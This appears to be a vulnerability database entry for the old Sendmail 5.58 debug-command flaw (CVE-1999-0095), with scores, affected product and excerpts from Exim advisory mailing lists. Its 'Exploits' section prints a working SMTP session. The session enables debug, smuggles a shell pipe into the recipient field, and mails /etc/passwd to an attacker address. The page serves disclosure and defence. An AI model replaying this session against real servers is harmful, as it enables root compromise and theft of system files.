CVE-1999-0095

Published: 01/10/1988 Updated: 11/06/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The debug command in Sendmail is enabled, allowing malicious users to execute commands as root.

Affected Products

Vendor: Eric Allman | Product: Sendmail | Versions: 5.58

Exploits

220 mailvictimcom SMTP
helo attackercom
250 Hello attackercom, pleased to meet you
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF><CRLF>
mail evil@attackercom </etc/passwd
250 OK
quit
221 mailvictimcom Terminating
The ...

Mailing Lists

Qualys Security Advisory: The Return of the WIZard: RCE in Exim (CVE-2019-10149). Contents: Summary; Local exploitation; Remote exploitation (Non-default configurations, Default configuration); Acknowledgm ...
Hi all, On Wed, Jun 05, 2019 at 05:19:44PM +0200, Heiko Schlittermann wrote: As per the distros list policy: Below is an abridged version of our advisory (with all the vulnerability details, but without exploitation details); we will publish the complete version in 24 hours, or as soon as third-party exploits are published, whichever happens fi ...